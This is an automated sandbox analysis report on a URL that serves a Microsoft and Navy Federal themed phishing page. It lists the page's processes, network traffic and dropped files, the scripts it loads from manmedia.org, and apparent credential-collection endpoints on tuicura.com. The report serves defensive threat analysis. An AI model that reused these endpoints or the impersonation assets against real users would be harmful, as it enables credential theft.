Play interactive tour

Edit tour

Analysis Report https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d

Overview

General Information

Sample URL:	https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d
Analysis ID:	356753
Infos:
Most interesting Screenshot:

Detection

HTMLPhisher

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish_10

Classification

Startup

System is w10x64

iexplore.exe (PID: 5116 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4696 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6480 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6544 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4568 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6264 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Phishing:

Yara detected HtmlPhish_10

Show sources

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html, type: DROPPED
Source: Yara match	File source: C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial, type: DROPPED

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49744 version: TLS 1.2

Networking:

Source: unknown

DNS traffic detected: queries for: bms.kaseya.com

Source: actions[1].js.6.dr	String found in binary or memory: http://logo.clearbit.com/
Source: popper.min[1].js.6.dr	String found in binary or memory: http://opensource.org/licenses/MIT).
Source: style[1].css.6.dr	String found in binary or memory: https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.s
Source: style[1].css.6.dr	String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-2ivja-xubozxczt8hkuyvxiwoa4vmtaxu-16djdwpc4/logintenantbrand
Source: style[1].css.6.dr	String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-bo8shd6svfocawg-d1lkuqyily-ch6cw-n5c0rmtwbq/logintenantbrand
Source: style[1].css.6.dr	String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logintenantbrandi
Source: style[1].css.6.dr	String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logintenantbrand
Source: style[1].css.6.dr	String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-pglwtvfgjxd-jsxdxcu-ixstqem6dnqipplqonbe8ro/logintenantbrand
Source: style[1].css.6.dr	String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-uhsmbqxf0i-fc4inz9zgqi96xh-agvghl3xbkxk-y7c/logintenantbrand
Source: style[1].css.6.dr	String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-xs-ly6aik51q1xmokwuzg7cgil517bv-ngigbudd-ua/logintenantbrand
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
Source: GetFile[1].htm.3.dr	String found in binary or memory: https://bms.kaseya.com/media/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWd
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://code.jquery.com/jquery-3.3.1.slim.min.js
Source: bootstrap.min[1].js.6.dr	String found in binary or memory: https://getbootstrap.com/)
Source: bootstrap.min[1].js.6.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: bootstrap.min[1].js.6.dr	String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: actions[1].js.6.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://manmedia.org/offic/n.page/actions.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://manmedia.org/offic/n.page/jqueryLib.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://manmedia.org/offic/n.page/style.css
Source: style[1].css.6.dr	String found in binary or memory: https://my.navyfederal.org/NFOAA_Auth/resources/img/css/img-billboard-BG.svg);
Source: style[1].css.6.dr	String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-daldttgld72orokijcgtjn9zgk-dhdwrgaphu-0dqka/log
Source: style[1].css.6.dr	String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logi
Source: style[1].css.6.dr	String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/log
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/cdnbundles/converged.v2.login.m
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://tuicura.com/offic/next2.php
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://tuicura.com/offic/nexxt.php
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://www.google.com/s2/favicons?sz=16&domain_url=
Source: actions[1].js.6.dr, 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://www.google.com/s2/favicons?sz=32&domain_url=
Source: actions[1].js.6.dr, 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	String found in binary or memory: https://www.google.com/s2/favicons?sz=64&domain_url=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49744 version: TLS 1.2

System Summary:

Source: classification engine

Classification label: mal48.phis.win@11/32@9/5

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{835A355E-7633-11EB-90E5-ECF4BB2D2496}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF08A6A974461167F6.TMP

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d	0%	Avira URL Cloud	safe

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://manmedia.org/offic/n.page/actions.js	0%	Avira URL Cloud	safe
https://aadcdn.msftauthimg.net/dbd5a2dd-xs-ly6aik51q1xmokwuzg7cgil517bv-ngigbudd-ua/logintenantbrand	0%	Avira URL Cloud	safe
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/log	0%	Avira URL Cloud	safe
https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.s	0%	Avira URL Cloud	safe
https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/cdnbundles/converged.v2.login.m	0%	Avira URL Cloud	safe
https://aadcdn.msftauthimg.net/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logintenantbrand	0%	Avira URL Cloud	safe
https://tuicura.com/offic/next2.php	0%	Avira URL Cloud	safe
https://aadcdn.msftauthimg.net/dbd5a2dd-2ivja-xubozxczt8hkuyvxiwoa4vmtaxu-16djdwpc4/logintenantbrand	0%	Avira URL Cloud	safe
https://manmedia.org/offic/n.page/jqueryLib.js	0%	Avira URL Cloud	safe
https://aadcdn.msftauthimg.net/dbd5a2dd-pglwtvfgjxd-jsxdxcu-ixstqem6dnqipplqonbe8ro/logintenantbrand	0%	Avira URL Cloud	safe
https://aadcdn.msftauthimg.net/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logintenantbrandi	0%	Avira URL Cloud	safe
https://aadcdn.msftauthimg.net/dbd5a2dd-uhsmbqxf0i-fc4inz9zgqi96xh-agvghl3xbkxk-y7c/logintenantbrand	0%	Avira URL Cloud	safe
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logi	0%	Avira URL Cloud	safe
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-daldttgld72orokijcgtjn9zgk-dhdwrgaphu-0dqka/log	0%	Avira URL Cloud	safe
https://tuicura.com/offic/nexxt.php	0%	Avira URL Cloud	safe
https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7	0%	Avira URL Cloud	safe
https://aadcdn.msftauthimg.net/dbd5a2dd-bo8shd6svfocawg-d1lkuqyily-ch6cw-n5c0rmtwbq/logintenantbrand	0%	Avira URL Cloud	safe
https://manmedia.org/offic/n.page/style.css	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cs1100.wpc.omegacdn.net	152.199.23.37	true	false	unknown
cdnjs.cloudflare.com	104.16.19.94	true	false	high
origin-bms.kaseya.com	52.144.52.222	true	false	high
manmedia.org	204.93.216.87	true	false	unknown
stackpath.bootstrapcdn.com	unknown	unknown	false	high
bms.kaseya.com	unknown	unknown	false	high
code.jquery.com	unknown	unknown	false	high
aadcdn.msftauth.net	unknown	unknown	false	unknown
ajax.aspnetcdn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
0	true		low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://manmedia.org/offic/n.page/actions.js	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false	Avira URL Cloud: safe	unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-xs-ly6aik51q1xmokwuzg7cgil517bv-ngigbudd-ua/logintenantbrand	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false		high
https://my.navyfederal.org/NFOAA_Auth/resources/img/css/img-billboard-BG.svg);	style[1].css.6.dr	false		high
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/log	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.s	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201	actions[1].js.6.dr	false		high
https://code.jquery.com/jquery-3.3.1.slim.min.js	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false		high
https://bms.kaseya.com/media/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWd	GetFile[1].htm.3.dr	false		high
https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/cdnbundles/converged.v2.login.m	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false	Avira URL Cloud: safe	unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logintenantbrand	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://getbootstrap.com/)	bootstrap.min[1].js.6.dr	false		high
https://tuicura.com/offic/next2.php	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false	Avira URL Cloud: safe	unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-2ivja-xubozxczt8hkuyvxiwoa4vmtaxu-16djdwpc4/logintenantbrand	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://manmedia.org/offic/n.page/jqueryLib.js	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false	Avira URL Cloud: safe	unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-pglwtvfgjxd-jsxdxcu-ixstqem6dnqipplqonbe8ro/logintenantbrand	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false		high
https://aadcdn.msftauthimg.net/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logintenantbrandi	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/graphs/contributors)	bootstrap.min[1].js.6.dr	false		high
https://aadcdn.msftauthimg.net/dbd5a2dd-uhsmbqxf0i-fc4inz9zgqi96xh-agvghl3xbkxk-y7c/logintenantbrand	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logi	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
http://logo.clearbit.com/	actions[1].js.6.dr	false		high
https://github.com/twbs/bootstrap/blob/master/LICENSE)	bootstrap.min[1].js.6.dr	false		high
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-daldttgld72orokijcgtjn9zgk-dhdwrgaphu-0dqka/log	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://tuicura.com/offic/nexxt.php	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false	Avira URL Cloud: safe	unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false		high
http://opensource.org/licenses/MIT).	popper.min[1].js.6.dr	false		high
https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false	Avira URL Cloud: safe	unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-bo8shd6svfocawg-d1lkuqyily-ch6cw-n5c0rmtwbq/logintenantbrand	style[1].css.6.dr	false	Avira URL Cloud: safe	unknown
https://manmedia.org/offic/n.page/style.css	46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
204.93.216.87	unknown	United States	23352	SERVERCENTRALUS	false
152.199.23.37	unknown	United States	15133	EDGECASTUS	false
52.144.52.222	unknown	United States	50292	STRATOGENGB	false
104.16.19.94	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356753
Start date:	23.02.2021
Start time:	16:01:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.phis.win@11/32@9/5
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 23.211.6.115, 104.43.193.48, 168.61.161.212, 88.221.62.148, 209.197.3.24, 209.197.3.15, 152.199.19.160, 216.58.212.170, 142.250.185.164, 51.11.168.160, 152.199.19.161, 2.20.142.209, 2.20.142.210, 51.103.5.186, 52.155.217.156, 92.122.213.247, 92.122.213.194, 20.54.26.129, 184.30.20.56 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cds.s5x3j6q5.hwcdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, mscomajax.vo.msecnd.net, audownload.windowsupdate.nsatc.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, cs22.wpc.v0cdn.net, ajax.googleapis.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, aadcdnoriginneu.azureedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, aadcdnoriginneu.ec.azureedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, cds.j3z9t3p6.hwcdn.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. VT rate limit hit for: https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{835A355E-7633-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	32344
Entropy (8bit):	1.7941220937304676
Encrypted:	false
SSDEEP:	96:rJZaZJ2aWftwAfvSe1M82TBHQveLBqMvOD2:rJZaZJ2aWft7fvxMFB1sMW2
MD5:	2376B63DD99A21BB38F9BF23ACF1D86C
